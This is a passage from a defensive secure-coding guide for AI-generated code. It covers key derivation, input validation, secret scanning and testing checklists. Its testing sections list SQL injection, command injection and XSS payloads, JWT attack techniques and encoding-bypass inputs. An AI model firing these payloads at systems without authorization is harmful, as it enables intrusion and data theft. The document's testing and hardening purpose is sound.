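        salt = secrets.token_bytes(16)  # fresh random salt from the CSPRNG
    key = hashlib.pbkdf2_hmac(
        "sha256", passphrase.encode("utf-8"), salt, iterations, dklen=32
    )
    return key, salt


def sign(key, message):
    """Return an HMAC-SHA256 tag for message."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key, message, tag):
    """Check a tag in constant time instead of using ==."""
    return hmac.compare_digest(sign(key, message), tag)


if __name__ == "__main__":
    key, salt = derive_key("correct horse battery staple")
    tag = sign(key, b"order:42")
    print(verify(key, b"order:42", tag), verify(key, b"order:43", tag))
```

The salt is not secret and has to be stored next to the derived output so the same key can be derived again.
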
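| ✓ | Checkpoint |
|---|---|
| □ | All validation performed server-side |
| □ | Schema validation with `additionalProperties: false` |
| □ | All regex patterns anchored with `^` and `$` |
| □ | Length limits checked before regex matching |
| □ | Null bytes rejected in string input |
| □ | Unicode normalization applied before validation |
| □ | Explicit type coercion with error handling |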
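
Several of these checkpoints can be combined in a single validator. The sketch below uses a hypothetical username rule (lowercase letters, digits, underscore, 3 to 32 characters); the function and constant names are assumptions. In Python, `fullmatch` is used for anchoring because `$` also matches just before a trailing newline.

```python
import re
import unicodedata

# Hypothetical rule for illustration: 3-32 lowercase letters, digits, underscore.
USERNAME_PATTERN = re.compile(r"[a-z0-9_]{3,32}")
MAX_USERNAME_LENGTH = 32


def validate_username(raw):
    """Return the normalized username or raise ValueError."""
    # Type check first: arrays, objects, and numbers are rejected outright.
    if not isinstance(raw, str):
        raise ValueError("Username must be a string")
    if "\x00" in raw:
        raise ValueError("Null bytes are not allowed")
    # Normalize before validating so look-alike forms collapse to one value.
    normalized = unicodedata.normalize("NFKC", raw).strip().lower()
    # Length limit before the regex keeps the match cost bounded.
    if len(normalized) > MAX_USERNAME_LENGTH:
        raise ValueError("Username too long")
    # fullmatch anchors at both ends of the string.
    if USERNAME_PATTERN.fullmatch(normalized) is None:
        raise ValueError("Invalid username format")
    return normalized


if __name__ == "__main__":
    print(validate_username("  Alice_01 "))
```
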
// Automated Secret Detection
1. Pre-commit hooks with secret scanners:
- TruffleHog
- detect-secrets
- gitleaks
- git-secrets
2. CI/CD Pipeline Scanning:
- Run on every PR/MR
- Scan full git history on merge to main
- Block deployment on secret detection
3. Runtime Detection:
- Log analysis for credential patterns
- API request auditing for hardcoded keys
- Cloud provider secret exposure alerts
// Testing Checklist
- [ ] Scan all source files for API key patterns
- [ ] Scan all config files for password strings
- [ ] Check git history for past secret commits
- [ ] Verify environment variables are properly loaded
- [ ] Test application behavior when secrets are missing
- [ ] Verify secrets are not exposed in error messages
// Automated Testing Tools
1. SAST (Static Analysis):
- Semgrep with injection rules
- CodeQL injection queries
- SonarQube SQL injection checks
2. DAST (Dynamic Analysis):
- SQLMap for SQL injection
- Burp Suite active scanning
- OWASP ZAP automated scan
3. Manual Testing Payloads:
// SQL Injection
- Single quote: '
- Comment: -- or #
- Boolean: ' OR '1'='1
- Time-based: '; WAITFOR DELAY '0:0:10'--
- Union: ' UNION SELECT null,null--
// Command Injection
- Semicolon: ;whoami
- Pipe: |id
- Backticks: `whoami`
- Command substitution: $(whoami)
- Newline: %0a id
// Testing Checklist
- [ ] Test all user input fields with injection payloads
- [ ] Test ORDER BY, LIMIT, table name parameters
- [ ] Test stored data for second-order injection
- [ ] Test file paths for command injection
- [ ] Verify all queries use parameterization
- [ ] Check logs don't reveal injection success/failure
// Automated Testing
1. Browser Tools:
- DOM Invader (Burp)
- XSS Hunter
- DOMPurify testing mode
2. Automated Scanners:
- Burp Suite XSS scanner
- OWASP ZAP active scan
- Nuclei XSS templates
3. Manual Testing Payloads:
// HTML Context
- <script>alert(1)</script>
- <img src=x onerror=alert(1)>
- <svg onload=alert(1)>
// Attribute Context
- " onmouseover="alert(1)
- ' onfocus='alert(1)' autofocus='
// JavaScript Context
- '-alert(1)-'
- ';alert(1)//
- \u003cscript\u003e
// URL Context
- javascript:alert(1)
- data:text/html,<script>alert(1)</script>
// Testing Checklist
- [ ] Test all output points with context-specific payloads
- [ ] Test encoding bypass techniques
- [ ] Test DOM XSS with source/sink analysis
- [ ] Verify CSP headers block inline scripts
- [ ] Test mutation XSS with sanitizer bypass payloads
- [ ] Check for polyglot XSS across contexts
// Testing Tools
1. Session Analysis:
- Burp Suite session handling
- OWASP ZAP session management
- Custom scripts for token analysis
2. JWT Testing:
- jwt.io debugger
- jwt_tool
- jose library testing
3. Manual Testing:
// Session Token Analysis
- Check entropy (should be 256+ bits)
- Test token predictability
- Test session fixation
// JWT Attacks
- Algorithm confusion (RS256 → HS256)
- None algorithm bypass
- Key injection attacks
- Signature stripping
// Authentication Bypass
- SQL injection in login
- Password reset token prediction
- OAuth state parameter manipulation
// Testing Checklist
- [ ] Test session token randomness
- [ ] Verify session invalidation on logout
- [ ] Test for session fixation
- [ ] Verify JWT algorithm validation
- [ ] Test rate limiting on login
- [ ] Check for timing attacks on password comparison
- [ ] Test password reset flow for token issues
// Crypto Testing Tools
1. Static Analysis:
- Semgrep crypto rules
- CryptoGuard
- Crypto-detector
2. Manual Review:
// Check for weak algorithms:
grep -r "MD5\|SHA1\|DES\|RC4\|ECB" .
// Check for static IVs (-E enables the + quantifier):
grep -rE "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" .
// Check for weak randomness:
grep -r "Math\.random\|random\.random\|rand()" .
3. Runtime Testing:
- Encrypt same plaintext twice, verify different ciphertext
- Test key derivation iterations (should take 100ms+)
- Verify timing consistency in comparisons
// Testing Checklist
- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage
- [ ] Confirm unique IV/nonce per encryption
- [ ] Test password hashing takes appropriate time (100ms+)
- [ ] Verify CSPRNG used for all secrets
- [ ] Check key derivation iteration counts
- [ ] Test for padding oracle vulnerabilities
- [ ] Verify constant-time comparison functions
// Testing Approach
1. Boundary Testing:
- Empty strings, null, undefined
- Max length + 1
- Integer boundaries (MAX_INT, MIN_INT)
- Unicode normalization variants
2. Type Confusion:
- Array where string expected: ["value"]
- Object where string expected: {"$gt": ""}
- Number where string expected: 12345
- Boolean where object expected: true
3. Encoding Bypass:
- URL encoding: %00, %2e%2e%2f
- Unicode: \u0000, \ufeff
- Double encoding: %252e
- Overlong UTF-8
4. ReDoS Testing:
- For each regex, test with: (valid_char * 30) + invalid_char
- Measure response time (should be < 100ms)
- Use regex-dos-detector tools
// Testing Checklist
- [ ] Test all endpoints with null/empty values
- [ ] Test numeric fields with boundary values
- [ ] Test string fields with max length exceeded
- [ ] Test type confusion for all input fields
- [ ] Test regex patterns for ReDoS
- [ ] Verify server-side validation matches client-side
- [ ] Test Unicode normalization issues
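
The type confusion cases in step 2 lend themselves to a small reusable harness. The sketch below is illustrative: `validate_login_payload` stands in for whatever validator is under test, and `run_type_confusion_suite` is a hypothetical helper that substitutes each wrong-typed value into one field and reports the values the validator failed to reject.

```python
def validate_login_payload(payload):
    """Example validator under test: returns a list of errors, empty when valid."""
    if not isinstance(payload, dict):
        return ["Payload must be an object"]
    errors = []
    for field in ("email", "password"):
        # isinstance(..., str) rejects lists, dicts, numbers, booleans, and None.
        if not isinstance(payload.get(field), str):
            errors.append(f"{field}: expected string")
    return errors


# Wrong-typed values taken from the checklist above, plus None.
TYPE_CONFUSION_CASES = [["test@test.com"], {"$gt": ""}, 12345, True, None]


def run_type_confusion_suite(validator, field, valid_payload):
    """Return the substituted values that the validator wrongly accepted."""
    accepted = []
    for bad_value in TYPE_CONFUSION_CASES:
        candidate = dict(valid_payload)
        candidate[field] = bad_value
        if not validator(candidate):  # an empty error list means "accepted"
            accepted.append(bad_value)
    return accepted


if __name__ == "__main__":
    valid = {"email": "user@example.com", "password": "x" * 12}
    for field in valid:
        leaks = run_type_confusion_suite(validate_login_payload, field, valid)
        print(field, "accepted wrong types:", leaks)
```

An empty result for every field means the validator rejected all substituted types; any value in the list is a finding to fix.
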
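This depth document covers the 6 most critical security patterns in detail. For coverage of additional security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes:
| Pattern Category | Patterns Covered |
|---|---|
| File System Security | Path traversal, insecure file uploads, insecure temporary files |
| Access Control | Missing authorization checks, IDOR, privilege escalation |
| Network Security | SSRF, insecure deserialization, unvalidated redirects |
| Error Handling | Information disclosure, stack traces, verbose errors |
| Logging Security | Sensitive data in logs, insufficient logging |
| Concurrency | Race conditions, TOCTOU, deadlocks |
| Dependency Security | Outdated dependencies, typosquatting, lock file tampering |
| Configuration | Debug mode in production, default credentials |
| API Security | Mass assignment, excessive data exposure, rate limiting |

Use the breadth document for quick reference across many patterns. Use this depth document for a thorough understanding of the most critical ones.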
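| Pattern | OWASP Cheat Sheet |
|---|---|
| Secrets Management | Secrets Management Cheat Sheet |
| SQL Injection | Query Parameterization Cheat Sheet |
| XSS | XSS Prevention Cheat Sheet |
| Authentication | Authentication Cheat Sheet |
| Session Management | Session Management Cheat Sheet |
| Cryptography | Cryptographic Storage Cheat Sheet |
| Input Validation | Input Validation Cheat Sheet |

| Pattern | Primary CWEs |
|---|---|
| Hardcoded Secrets | CWE-798, CWE-259, CWE-321, CWE-200 |
| SQL Injection | CWE-89, CWE-564 |
| Command Injection | CWE-78, CWE-77 |
| XSS | CWE-79, CWE-80, CWE-83, CWE-87 |
| Authentication | CWE-287, CWE-384, CWE-613, CWE-307 |
| Session Security | CWE-384, CWE-613, CWE-614, CWE-1004 |
| Cryptographic Failures | CWE-327, CWE-328, CWE-329, CWE-338, CWE-916 |
| Input Validation | CWE-20, CWE-1333, CWE-185, CWE-176 |

| Tool | Purpose | URL |
|---|---|---|
| Semgrep | Static analysis with security rules | https://semgrep.dev |
| CodeQL | GitHub security queries | https://codeql.github.com |
| TruffleHog | Secret scanning | https://github.com/trufflesecurity/trufflehog |
| SQLMap | SQL injection testing | https://sqlmap.org |
| Burp Suite | Web security testing | https://portswigger.net/burp |
| OWASP ZAP | Open-source web security scanner | https://www.zaproxy.org |
| jwt_tool | JWT security testing | https://github.com/ticarpi/jwt_tool |
| Gitleaks | Git secret scanning | https://github.com/gitleaks/gitleaks |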
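Document: AI Code Security Anti-Patterns: Depth Version
Version: 1.0.0
Last updated: 2026-01-18
Patterns covered: 6 (hardcoded secrets, SQL/command injection, XSS, authentication/session, cryptography, input validation)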
| Date | Version | Changes |
|---|---|---|
| 2026-01-18 | 1.0.0 | Initial release with 6 comprehensive pattern deep-dives |
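This document is part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models are updated. Contributions are welcome in the following areas:
This document is designed to be included in an AI assistant's context window to improve the security of generated code. For best results, include it together with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.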